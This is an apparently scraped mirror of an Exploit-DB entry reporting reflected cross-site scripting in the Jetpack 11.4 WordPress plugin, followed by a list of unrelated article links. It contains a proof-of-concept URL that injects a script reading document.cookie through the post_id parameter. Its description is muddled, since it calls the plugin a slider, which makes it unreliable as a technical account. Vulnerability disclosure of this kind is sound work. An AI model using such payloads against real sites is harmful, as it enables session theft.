[webapps] Jetpack 11.4 - Cross Site Scripting (XSS)

1 year ago

source link: https://www.exploit-db.com/exploits/51104
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

Jetpack 11.4 - Cross Site Scripting (XSS)

EDB-ID:

51104

EDB Verified:

Platform:

PHP

Date:

2023-03-28

Vulnerable App:

# Exploit Title: Jetpack 11.4 - Cross Site Scripting (XSS)
# Date: 2022-10-19
# Author: Behrouz Mansoori
# Software Link: https://wordpress.org/plugins/jetpack
# Version: 11.4
# Tested on: Mac m1
# CVE: N/A

1. Description:
This plugin creates a Jetpack from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.

2. Proof of Concept:
http://localhost/modules/contact-form/grunion-form-view.php?post_id=<script>alert(document.cookie)</script>

Copy

Recommend

[webapps] Jetpack 11.4 - Cross Site Scripting (XSS)

Jetpack 11.4 - Cross Site Scripting (XSS)

EDB-ID:

51104

Platform:

PHP

Date:

2023-03-28

Recommend

4 new rules for PPC ad creative

Feel the Music: Sonos Speakers Have Apple Music Spatial Audio

The intersection of AI and human creativity

浅谈G行桌面云服务平台的实践

加快智慧农业战略落地，潍柴雷沃创业板IPO申请被受理

Understanding TypeScript Function Types: A Beginner's Guide

Google Recorder: How to set speaker labels, backup recordings, and more on Pixel

长链接缩短为短链接如何操作？ | 缩我短网址

FREE Hunting Clash Gold Generator Hack No Survey

康佳集团2022年报：消费类电子业务规模同比降21.63%，坚持“消费类电子+半导体+新能源...

About Joyk